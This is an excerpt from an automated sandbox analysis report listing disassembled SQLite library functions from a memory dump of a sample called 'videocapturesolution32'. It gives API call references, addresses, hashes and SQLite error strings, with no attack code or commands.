                                                          • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                          • String ID: optimize
                                                          • API String ID: 3659050757-3797040228
                                                          • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                          • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                          • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                          • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                          APIs
                                                          • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                          • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                          • sqlite3_reset.SQLITE3 ref: 60965556
                                                          • sqlite3_reset.SQLITE3 ref: 609655B8
                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                          • sqlite3_malloc.SQLITE3 ref: 60965655
                                                          • sqlite3_free.SQLITE3 ref: 60965714
                                                          • sqlite3_free.SQLITE3 ref: 6096574B
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          • sqlite3_free.SQLITE3 ref: 609657AA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                          • String ID:
                                                          • API String ID: 2722129401-0
                                                          • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                          • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                          • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                          • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                          APIs
                                                          • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                            • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                          • sqlite3_free.SQLITE3 ref: 609647C5
                                                            • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                          • sqlite3_free.SQLITE3 ref: 6096476B
                                                            • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                          • sqlite3_free.SQLITE3 ref: 6096477B
                                                          • sqlite3_free.SQLITE3 ref: 60964783
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                          • String ID:
                                                          • API String ID: 571598680-0
                                                          • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                          • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                          • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                          • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                          APIs
                                                          • sqlite3_mprintf.SQLITE3 ref: 60929761
                                                            • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                            • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                          • sqlite3_mprintf.SQLITE3 ref: 609297C8
                                                          • sqlite3_mprintf.SQLITE3 ref: 6092988B
                                                          • sqlite3_free.SQLITE3 ref: 609298A4
                                                          • sqlite3_free.SQLITE3 ref: 609298AC
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_mprintf$sqlite3_free$sqlite3_initializesqlite3_vmprintf
                                                          • String ID:
                                                          • API String ID: 251866411-0
                                                          • Opcode ID: a3bf00685530be514bf65e4252527f4a7bfa11b3ac4fddf1f02e32dfe1b6d316
                                                          • Instruction ID: c0caaa5c89e6f65941469514643da9571fc5146b16edc1869e8ccb0497590022
                                                          • Opcode Fuzzy Hash: a3bf00685530be514bf65e4252527f4a7bfa11b3ac4fddf1f02e32dfe1b6d316
                                                          • Instruction Fuzzy Hash: 4C417970E142098FCB00DF68D48069EFBF6FFAA314F15852AE855AB344DB34D842CB81
                                                          APIs
                                                          • sqlite3_value_int.SQLITE3 ref: 6091A7A9
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A7C3
                                                          • sqlite3_value_blob.SQLITE3 ref: 6091A7D0
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A7E3
                                                          • sqlite3_value_int.SQLITE3 ref: 6091A842
                                                          • sqlite3_result_text.SQLITE3 ref: 6091A973
                                                          • sqlite3_result_blob.SQLITE3 ref: 6091AA08
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_int$sqlite3_result_blobsqlite3_result_textsqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                          • String ID:
                                                          • API String ID: 1854132711-0
                                                          • Opcode ID: 784825b838f169ca3662fcccfed6716ebcc1b6a8caffef0423c1b1d1c55abeb3
                                                          • Instruction ID: 5a39f3de11663d91415d6d961256fd3a5a8574b0eada45011bd6777fd74d0884
                                                          • Opcode Fuzzy Hash: 784825b838f169ca3662fcccfed6716ebcc1b6a8caffef0423c1b1d1c55abeb3
                                                          • Instruction Fuzzy Hash: 6CA15C71E0862D8BDB05CFA9C88069DB7B2BF69324F148299E865A7391D734DC86CF50
                                                          APIs
                                                          • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                            • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                          • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                          • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                          • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                          • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                          • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                          • sqlite3_free.SQLITE3 ref: 60963621
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                          • String ID:
                                                          • API String ID: 4276469440-0
                                                          • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                          • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                          • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                          • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                          APIs
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                          Strings
                                                          • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                          • ESCAPE expression must be a single character, xrefs: 6091A293
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                          • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                          • API String ID: 4080917175-264706735
                                                          • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                          • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                          • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                          • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                          APIs
                                                            • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                          • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                          • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                          • String ID: library routine called out of sequence$out of memory
                                                          • API String ID: 2019783549-3029887290
                                                          • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                          • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                          • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                          • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                          APIs
                                                          • sqlite3_finalize.SQLITE3 ref: 609406E3
                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                            • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                          • sqlite3_free.SQLITE3 ref: 609406F7
                                                          • sqlite3_free.SQLITE3 ref: 60940705
                                                          • sqlite3_free.SQLITE3 ref: 60940713
                                                          • sqlite3_free.SQLITE3 ref: 6094071E
                                                          • sqlite3_free.SQLITE3 ref: 60940729
                                                          • sqlite3_free.SQLITE3 ref: 6094073C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_log$sqlite3_finalize
                                                          • String ID:
                                                          • API String ID: 1159759059-0
                                                          • Opcode ID: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                          • Instruction ID: 8ceab58ab7f3fb7faec85fb80e78016d1f3d655de586deaf1cb04ee1bc4e3406
                                                          • Opcode Fuzzy Hash: 19269ae46022e444f8470c890b78f38089a522c4155da373e534dfec766a18bc
                                                          • Instruction Fuzzy Hash: C801E8B45447108BDB00AF78C4C5A59BBE5EF79B18F06096DECCA8B305D734D8809B91
                                                          APIs
                                                          • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                            • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                          • sqlite3_log.SQLITE3 ref: 609498F5
                                                          Strings
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                          • String ID: List of tree roots: $d$|
                                                          • API String ID: 3709608969-1164703836
                                                          • Opcode ID: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                          • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                          • Opcode Fuzzy Hash: 4de08d56d8a6e192ae2dda07a929c8b2a00a3f2e2d212eb9bfb53aebfe2a6bac
                                                          • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                          APIs
                                                            • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                            • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                            • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                            • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                          • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                          • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                          • sqlite3_free.SQLITE3 ref: 6096029A
                                                          Strings
                                                          Similarity
                                                          • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                          • String ID: e
                                                          • API String ID: 786425071-4024072794
                                                          • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                          • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                          • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                          • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: sqlite3_exec
                                                          • String ID: sqlite_master$sqlite_temp_master$|
                                                          • API String ID: 2141490097-2247242311
                                                          • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                          • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                          • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                          • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                          APIs
                                                          Similarity
                                                          • API ID: sqlite3_free$memcmpsqlite3_realloc
                                                          • String ID:
                                                          • API String ID: 3422960571-0
                                                          • Opcode ID: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                          • Instruction ID: 3b390e38dde49c5924589a602beaf2ee173d98914be71c714148da16d267e2cf
                                                          • Opcode Fuzzy Hash: 50eda45380483794e32bdd730fc6b6b580c41d30328003452ec2c22d7d846426
                                                          • Instruction Fuzzy Hash: 42B1D0B4E142189BEB05CFA9C5807DDBBF6BFA8304F148429E858A7344D374E946CF91
                                                          APIs
                                                            • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                          • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                          • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                          • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                          • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                            • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                            • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                            • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                            • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                          Similarity
                                                          • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                          • String ID:
                                                          • API String ID: 683514883-0
                                                          • Opcode ID: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                          • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                          • Opcode Fuzzy Hash: a6abbae8c6e8f2e89577a489a37bdbe998ef9662ada317e1813a59820f6ee2b0
                                                          • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                          APIs
                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                          • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                          • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                          • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                          • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                            • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                            • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                            • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                          • String ID:
                                                          • API String ID: 1903298374-0
                                                          • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                          • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                          • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                          • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                          APIs
                                                            • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                          • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                          • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                          • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                          Similarity
                                                          • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                          • String ID:
                                                          • API String ID: 1894464702-0
                                                          • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                          • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                          • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                          • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                          APIs
                                                            • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                          • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                          • sqlite3_log.SQLITE3 ref: 609253E2
                                                          • sqlite3_log.SQLITE3 ref: 60925406
                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                          Similarity
                                                          • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                          • String ID:
                                                          • API String ID: 3336957480-0
                                                          • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                          • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                          • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                          • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                          APIs
                                                          • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                          • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                          • sqlite3_data_count.SQLITE3 ref: 60961465
                                                          • sqlite3_column_value.SQLITE3 ref: 60961476
                                                          • sqlite3_result_value.SQLITE3 ref: 60961482
                                                          Similarity
                                                          • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                          • String ID:
                                                          • API String ID: 3091402450-0
                                                          • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                          • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                          • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                          • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                          APIs
                                                          Similarity
                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                          • String ID:
                                                          • API String ID: 251237202-0
                                                          • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                          • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                          • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                          • Instruction Fuzzy Hash: 022137B46087158BC709AF68C48570ABBF6FFA5318F10895DEC958B345DB74E940CB82
                                                          APIs
                                                          • sqlite3_aggregate_context.SQLITE3 ref: 6091A31E
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A349
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A356
                                                          • sqlite3_value_text.SQLITE3 ref: 6091A37B
                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A387
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2975708946.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                          • Associated: 00000004.00000002.2975680159.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975764538.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975787948.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975811790.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975833883.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000004.00000002.2975855687.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_60900000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_aggregate_context
                                                          • String ID:
                                                          • API String ID: 4225432645-0
                                                          • Opcode ID: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                          • Instruction ID: 24a20a1669ecabf1c8c9e0f75de4e20f6480f0c3e20d7f4799920e66bb4c3c2a
                                                          • Opcode Fuzzy Hash: e7dd5294350f58c57afd4f2551108a775ab72f2657aaaf635efeb712e258985e
                                                          • Instruction Fuzzy Hash: 3F21CF71B086588FDB009F29C48075E7BE7AFA4254F0484A8E894CF305EB34DC86CB91
                                                          APIs
                                                          • sqlite3_mutex_enter.SQLITE3(?,-00000200,?), ref: 6090359D
